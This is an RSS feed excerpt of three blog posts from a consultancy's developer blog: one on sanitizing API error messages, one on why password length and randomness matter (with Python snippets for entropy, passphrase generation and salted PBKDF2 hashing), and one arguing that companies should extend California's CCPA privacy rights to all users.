&lt;p&gt;Make sure that any internal errors are caught and sanitized before being returned in your API responses. Your end users should never see any error messages that provide details on the architecture of your system. Raw error responses often contain a stack trace, and may expose information such as the database or libraries you're using, which an attacker may be able to use to exploit your system. Your error messages should be specific enough that the requester knows what happened, but generic enough as to not provide any details about the inner workings of your system. Also, make sure that your response uses the semantically appropriate HTTP status code for the given error.&lt;/p&gt;
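&lt;p&gt;One common pattern for this: log the full exception server-side, and hand the caller only a generic message with the appropriate status code. A minimal sketch, with the logger name and message text as placeholders:&lt;/p&gt;

```python
import logging

logger = logging.getLogger("api")

def safe_error_response(exc, status=500):
    """Log full error detail internally; return a sanitized response
    that reveals nothing about the system's internals."""
    logger.exception("internal error: %s", exc)  # stack trace stays server-side
    return {
        "statusCode": status,
        "body": {"message": "An internal error occurred. Please try again later."},
    }
```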

&lt;p&gt;When your customers' and associates' data is at stake, security should never be an afterthought. It needs to be included in the planning process from the very beginning. With these tips in mind, you should be on your way to designing a secure and reliable API for your users. For more information on securing your APIs, check out the &lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html" rel="noopener noreferrer"&gt;REST Security Cheat Sheet&lt;/a&gt; from OWASP.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>architecture</category>
      <category>privacy</category>
    </item>
    <item>
      <title>Why Password Length Matters</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 02 Sep 2020 20:20:33 +0000</pubDate>
      <link>https://forem.com/leading-edje/why-password-length-matters-g17</link>
      <guid>https://forem.com/leading-edje/why-password-length-matters-g17</guid>
      <description>&lt;p&gt;I was working at a client that had recently changed their password policy from a minimum of eight characters to a minimum of fifteen characters. I was somewhat surprised at the reaction from a lot of the developers and business partners in the organization. I heard it mentioned derisively during several meetings, and was warned about it by co-workers who had recently had to reset their passwords. I applaud the security team for making this change, so I thought I'd try to give a high-level explanation of why password length is so important. This &lt;a href="https://xkcd.com/936/" rel="noopener noreferrer"&gt;XKCD comic&lt;/a&gt; does a pretty good job of summing things up, but let's dive a little deeper.&lt;/p&gt;

&lt;p&gt;&lt;br&gt;&lt;br&gt;
&lt;a href="https://xkcd.com/936/" rel="noopener noreferrer"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fimgs.xkcd.com%2Fcomics%2Fpassword_strength.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How "strong" is your password
&lt;/h2&gt;

&lt;p&gt;When we talk about password "strength", we're talking about how difficult it would be to crack the password by trying all possible combinations of characters. The simplest measure of password strength is X&lt;sup&gt;L&lt;/sup&gt;, where X is the number of available characters and L is the length of the password. For example, if you can only use lowercase letters, X would be 26. If you can also use uppercase letters, X would be 52. The most common character set used in passwords today is 94 characters, which includes all alphanumeric and special characters on a standard keyboard. So, an 8-character password using this set would require 94&lt;sup&gt;8&lt;/sup&gt;, or 6,095,689,385,410,816, guesses to crack.&lt;/p&gt;
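&lt;p&gt;The arithmetic is easy to check in Python:&lt;/p&gt;

```python
def keyspace(charset_size, length):
    """Number of possible passwords: X to the power L."""
    return charset_size ** length

# 94 printable characters, 8-character password:
print(keyspace(94, 8))  # 6095689385410816
```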

&lt;p&gt;It's more common today to see password strength discussed in terms of "entropy". This value comes from information theory, and is measured in bits. The formula for bits of entropy is log&lt;sub&gt;2&lt;/sub&gt;(X&lt;sup&gt;L&lt;/sup&gt;), which equals L × log&lt;sub&gt;2&lt;/sub&gt;X. If you're like me, and prefer not to dive too much deeper into the math, &lt;a href="https://en.wikipedia.org/wiki/Password_strength#Random_passwords" rel="noopener noreferrer"&gt;this article has a handy chart&lt;/a&gt; for calculating bits of entropy. Using that chart with the character set from the previous example, we see that each character in our password gives us 6.555 bits. So, at 8 characters we have about 52.44 bits of entropy.&lt;/p&gt;

&lt;p&gt;Now, let's see what happens when we tweak the numbers a little. Say we decide to allow our passwords to use spaces (which you should). We now have a 95-character set, instead of 94. Using the same entropy chart, we now have 6.57 bits per character. With our previous 8-character password, that gives us 52.56 bits of entropy. So increasing the size of the character set by one increases entropy by 0.12 bits. Compare that with keeping the previous character set and increasing the length by one. At 6.555 bits per character, we now have about 59 bits, an increase of 6.56 bits. As you can see, increasing the length has a significantly greater impact on entropy than increasing the size of the character set.&lt;/p&gt;
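&lt;p&gt;You can verify these figures with Python's &lt;code&gt;math.log2&lt;/code&gt;:&lt;/p&gt;

```python
import math

def entropy_bits(charset_size, length):
    # log2(X ** L) is the same as L * log2(X)
    return length * math.log2(charset_size)

base = entropy_bits(94, 8)    # about 52.44 bits
wider = entropy_bits(95, 8)   # about 52.56 bits (+0.12)
longer = entropy_bits(94, 9)  # about 58.99 bits (+6.55)
print(round(base, 2), round(wider, 2), round(longer, 2))
```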

&lt;p&gt;But wait a minute! According to that formula, the password in the cartoon would have an entropy of 72 but it says it's only 28 bits. What's the deal?&lt;/p&gt;

&lt;p&gt;Well, that brings us to the real problem with calculating password strength. I won't go into the details of how the author came up with their number, but &lt;a href="https://security.stackexchange.com/a/6096" rel="noopener noreferrer"&gt;this StackExchange answer&lt;/a&gt; does a great job of breaking down the math, and it turns out, 28 bits is fairly accurate. The thing is, measuring bits of entropy using this formula only works when the password is completely random. And, it turns out that people are terrible at creating random passwords. So, how do you make a password more secure?&lt;/p&gt;

&lt;h2&gt;
  
  
  Password vs. Passphrase
&lt;/h2&gt;

&lt;p&gt;A passphrase consists of a set of words, rather than a set of characters. The first benefit of a passphrase is that it lets you pull from a much larger "character" set: each word effectively acts as a single character, and a dictionary offers far more options than 94 keyboard characters. Not every word in the dictionary works well as part of a passphrase, though, so it's common to use a curated list of fairly short words. A Diceware list, for example, contains 7,776 unique words. With a set that size, each word contributes 12.925 bits of entropy, so a passphrase of just 4 words has about 51.7 bits.&lt;/p&gt;
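&lt;p&gt;Generating a passphrase is straightforward with Python's &lt;code&gt;secrets&lt;/code&gt; module. The short &lt;code&gt;WORDS&lt;/code&gt; list below is a stand-in; a real Diceware list contains 7,776 words:&lt;/p&gt;

```python
import math
import secrets

# Stand-in list; a real Diceware list contains 7,776 words.
WORDS = ["correct", "horse", "battery", "staple", "ocean", "pencil"]

def make_passphrase(word_list, count):
    # secrets.choice provides the cryptographic randomness
    # that the entropy calculation assumes.
    return " ".join(secrets.choice(word_list) for _ in range(count))

# Entropy of 4 words drawn from a 7,776-word list:
print(round(4 * math.log2(7776), 1))  # 51.7
```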

&lt;p&gt;The second benefit of using passphrases is that they tend to be easier to remember. This is the author's main point in the comic. When you make users choose a password, and then make weird manipulations to it, like capitalizing letters and adding symbols, it tends to be difficult to remember. On the other hand, 4 common words are generally easier to remember.&lt;/p&gt;

&lt;p&gt;That said, passphrases suffer from one of the same problems as passwords: to get the full entropy, the words need to be selected randomly. When it comes to passwords, randomness is the key to security, because it prevents attackers from using information about the victim to reduce the number of guesses needed to crack the password.&lt;/p&gt;

&lt;p&gt;So, are passphrases better than passwords? Unfortunately, there isn't a simple answer. This topic has long been debated in the security community, with supporters on both sides. A good rule to follow is: if you can use a password manager, use a password. If you need to remember it yourself, use a passphrase.&lt;/p&gt;

&lt;h2&gt;
  
  
  What can you do to keep your passwords secure?
&lt;/h2&gt;

&lt;p&gt;So yes, adding length to a password increases the strength exponentially, but as you can see, there's a lot more to password security than just length versus complexity. Randomness is the key to good security, but it makes passwords difficult to remember. This leads to users choosing insecure passwords. Here are some things you can do to make sure your passwords are as strong as possible:&lt;/p&gt;

&lt;p&gt;If you're a user:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use a password manager if you can.&lt;/li&gt;
&lt;li&gt;Try to use a password that is at least 12 characters in length.&lt;/li&gt;
&lt;li&gt;Use a randomly generated password (especially if the site limits your password length).&lt;/li&gt;
&lt;li&gt;Don't reuse the same password on multiple systems.&lt;/li&gt;
&lt;li&gt;If you have to remember your password, consider using a passphrase.&lt;/li&gt;
&lt;li&gt;If you have to write your password down, keep it in a secure place, like a locked file drawer. &lt;b&gt;Don't&lt;/b&gt; leave it laying next to your keyboard or taped to your monitor.&lt;/li&gt;
&lt;li&gt;Enable 2-factor authentication if the site offers it.&lt;/li&gt;
&lt;/ul&gt;
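&lt;p&gt;If you want to generate a random password yourself, Python's &lt;code&gt;secrets&lt;/code&gt; module draws from a cryptographically secure source. A minimal sketch, using the full 94-character set discussed earlier:&lt;/p&gt;

```python
import secrets
import string

# Letters, digits, and punctuation: the 94-character keyboard set.
ALPHABET = string.ascii_letters + string.digits + string.punctuation

def random_password(length=16):
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(random_password())
```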

&lt;p&gt;If you're making security policy:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Always use salted hashes to store user passwords.&lt;/li&gt;
&lt;li&gt;Make sure your policy requires &lt;u&gt;at least&lt;/u&gt; 12 characters (more is better).&lt;/li&gt;
&lt;li&gt;Don't limit the number of characters allowed for a password.&lt;/li&gt;
&lt;li&gt;Allow all typeable characters (including spaces).&lt;/li&gt;
&lt;li&gt;Don't require uppercase, lowercase or special characters.&lt;/li&gt;
&lt;li&gt;Only require a user to change their passwords if you believe your system has been compromised.&lt;/li&gt;
&lt;li&gt;Don't allow password hints.&lt;/li&gt;
&lt;li&gt;Provide users with a password manager that can generate random passwords.&lt;/li&gt;
&lt;li&gt;Use 2-factor authentication.&lt;/li&gt;
&lt;/ul&gt;
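&lt;p&gt;As one way to implement that first point, here's a sketch using PBKDF2 from Python's standard library; the list above doesn't prescribe a specific algorithm, and bcrypt, scrypt, or Argon2 are equally reasonable choices:&lt;/p&gt;

```python
import hashlib
import hmac
import os

def hash_password(password):
    # A fresh random salt per user defeats precomputed (rainbow) tables.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    # Constant-time comparison avoids timing side channels.
    return hmac.compare_digest(candidate, digest)
```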

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>privacy</category>
    </item>
    <item>
      <title>Privacy Laws Are For Everyone - or at least they should be</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Mon, 15 Jun 2020 17:30:27 +0000</pubDate>
      <link>https://forem.com/leading-edje/privacy-laws-are-for-everyone-or-at-least-they-should-be-3l</link>
      <guid>https://forem.com/leading-edje/privacy-laws-are-for-everyone-or-at-least-they-should-be-3l</guid>
      <description>&lt;p&gt;The new &lt;a href="https://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=201720180AB375"&gt;privacy law&lt;/a&gt; passed by the California legislature went into effect January 1, 2020. While some of the specifics are still being worked out (the &lt;a href="https://oag.ca.gov/sites/all/files/agweb/pdfs/privacy/oal-sub-final-text-of-regs.pdf"&gt;final text of regulations&lt;/a&gt; was just submitted on June 1st), the intention of the law is to ensure five key rights for California consumers. They are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The right to know what personal information is being collected about them.&lt;/li&gt;
&lt;li&gt;The right to know if their information is being sold or disclosed, and to know who is getting access to it.&lt;/li&gt;
&lt;li&gt;The right to opt-out of the sale of their personal data.&lt;/li&gt;
&lt;li&gt;The right to access the data that a company has about them.&lt;/li&gt;
&lt;li&gt;The right to receive the same price and level of service if they choose to exercise their rights.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now, I want to make it clear that I'm not an attorney, and I do not claim to know all of the intricacies of the CCPA regulations. I was, however, part of a development team tasked with implementing compliance with the new law for a large e-commerce website. During this time, I was involved not only in implementing the technical changes needed, but also in some of the business discussions around the requirements. One thing that I kept hearing during these business discussions made me cringe. It was: "This only applies to users who live in California."&lt;/p&gt;

&lt;p&gt;Okay, that may seem like a fairly innocuous comment, and technically, it's true, but it was the intent behind the statement that really got to me. Look back at that list of five rights. They seem completely reasonable to me, and I think they would to most other users as well. But the company's legal and business teams were very adamant that the implemented changes should only be applied if we could verify that the request was coming from a resident of the state of California. Now, don't get me wrong, I understand their reasoning. They collect a lot of data about their users, and that data is very useful to their business. Additionally, the CCPA definitions of what constitutes "personal information" and "sales of data" are quite broad and cover a lot of business cases that go beyond specifically selling data for money. The company wants to continue collecting as much data as they can, so they can continue to operate in the same way they always have.&lt;/p&gt;

&lt;p&gt;I believe there are a couple of problems with this mindset though. First of all, there's the technical challenges. Identifying the data that belongs to a resident of California can be tricky. While there are already third-party companies offering to handle the processing of requests for data, it's far easier to handle all of the data in the same manner, regardless of where a user lives.&lt;/p&gt;

&lt;p&gt;Second, it's highly likely that other states will soon pass their own privacy laws. According to Axios, &lt;a href="https://www.axios.com/states-2020-tech-policy-fights-f467033d-c5f2-4467-a256-ee894c62190d.html"&gt;similar legislation is expected&lt;/a&gt; in New York, Illinois and Washington in 2020. There has also been some movement in Congress this year to pass &lt;a href="https://www.natlawreview.com/article/federal-privacy-legislation-update-consumer-data-privacy-and-security-act-2020"&gt;federal privacy regulations&lt;/a&gt;. Putting processes in place that deal only with users in California overlooks the big picture of where privacy laws are headed. Treating all users' data the same now may spare you some of the changes that will be required when new laws are passed.&lt;/p&gt;

&lt;p&gt;Finally, and most importantly, in my opinion, is customer sentiment. Yes, CCPA specifically applies to residents of California. But what will a customer living in South Dakota think about your company if they click the link to ask you not to sell their data and take the time to fill out the opt-out form, only to receive a response that the rules don't apply to them? It's likely that their opinion of your company will diminish considerably, and they may choose not to do business with you in the future.&lt;/p&gt;

&lt;p&gt;Before you commit to a process for implementing the new CCPA changes specifically for California residents, it may be prudent to consider these questions first. Is it worth the effort to implement technical changes for handling customers in a specific state? Will you need to change your process if other states pass similar laws? And, while it's true that, currently, you only have to comply with the new CCPA regulations for customers living in California, is it worth it to continue collecting and selling the data of other users, even if they ask you not to? Take a close look at the lifetime value of a customer, and consider whether it's more costly to lose their data, or to lose the customer entirely.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>privacy</category>
      <category>security</category>
    </item>
  </channel>
</rss>
